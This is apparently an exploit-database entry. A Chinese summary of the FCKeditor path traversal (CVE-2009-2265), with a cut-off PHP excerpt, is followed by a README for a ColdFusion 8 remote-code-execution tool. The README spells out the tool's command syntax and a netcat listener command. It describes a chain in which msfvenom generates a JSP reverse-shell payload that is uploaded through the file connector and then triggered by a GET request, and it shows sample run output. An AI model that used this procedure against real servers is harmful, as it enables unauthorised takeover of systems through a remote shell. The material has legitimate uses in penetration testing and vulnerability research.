POC详情: 56b7e5c180efdf6a3fa7719ae0b72e00fa5405f0

标题: FCKeditor 路径遍历漏洞 (CVE-2009-2265)
描述:FCKeditor是个人开发者的一款开源的专用于在网页上编辑HTML的编辑器。 FCKeditor的editor/filemanager/browser/default/connectors/php/connector.php模块中存在路径遍历漏洞: 147.function FileUpload( $resourceType, $currentFolder ) 148.{ 149.$sErrorNumber = '0' ; 150.$sFileName = '' ; 151. 152.if ( isse
Adobe ColdFusion 8 - Remote Command Execution (RCE)
# Adobe ColdFusion 8 - Remote Command Execution (RCE) Exploit

### **Overview**
This exploit targets a known vulnerability in Adobe ColdFusion 8 (CVE-2009-2265). It enables remote command execution (RCE) by uploading a malicious JSP payload that establishes a reverse shell connection.


### **Exploit Details**
- **CVE**: [CVE-2009-2265](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2265)
- **Vulnerability**: Improper handling of file uploads in Adobe ColdFusion 8.
- **Affected Versions**: Adobe ColdFusion 8.
- **Impact**: Allows attackers to execute arbitrary commands on the server.


### **Features**
1. Automatically generates a JSP payload using `msfvenom`.
2. Uploads the payload using a multipart POST request.
3. Triggers the payload to establish a reverse shell.
4. Automatically cleans up the local payload files after execution.


### **Usage**
To use this exploit, you need the following:
- A Kali Linux machine or a similar penetration testing environment.
- Netcat installed for listening on the specified port.
- A vulnerable Adobe ColdFusion 8 server.


### **Command Syntax**
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>

#### **Arguments**
- `-l <LHOST>`: Local attacker IP (e.g.,
- `-p <LPORT>`: Local attacker port for the reverse shell (e.g., 9001).
- `-r <RHOST>`: Remote target IP (e.g.,
- `-q <RPORT>`: Remote target port where ColdFusion is running (e.g., 8500).


### **Example Usage**
./CVE-2009-2265 -l -p 9001 -r -q 8500

1. Start a listener on your attacker machine:
   nc -lnvp 9001

2. Run the exploit with the appropriate arguments.

3. Once executed, the payload will connect back to your listener.


### **How It Works**
1. **Generate Payload**:
   - The script uses `msfvenom` to generate a malicious JSP payload.
   - The payload initiates a reverse shell to the specified LHOST and LPORT.

2. **Upload Payload**:
   - The payload is uploaded to the vulnerable ColdFusion server using a POST request.

3. **Trigger Payload**:
   - The uploaded payload is executed by sending a GET request to the file's URL.

4. **Establish Reverse Shell**:
   - A reverse shell is established, giving the attacker access to the target system.


### **Requirements**
- `msfvenom` for payload generation.
- `curl` for file upload and triggering the payload.
- `nc` (Netcat) for listening to reverse shell connections.


### **Example Output**
[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
    <script type="text/javascript">
        window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!


### **Disclaimer**
This script is for **educational purposes only**. Use it on systems you own or have explicit permission to test. Unauthorized use of this exploit on systems you do not own is illegal and unethical.


### **Author**
Developed by [0xDTC].

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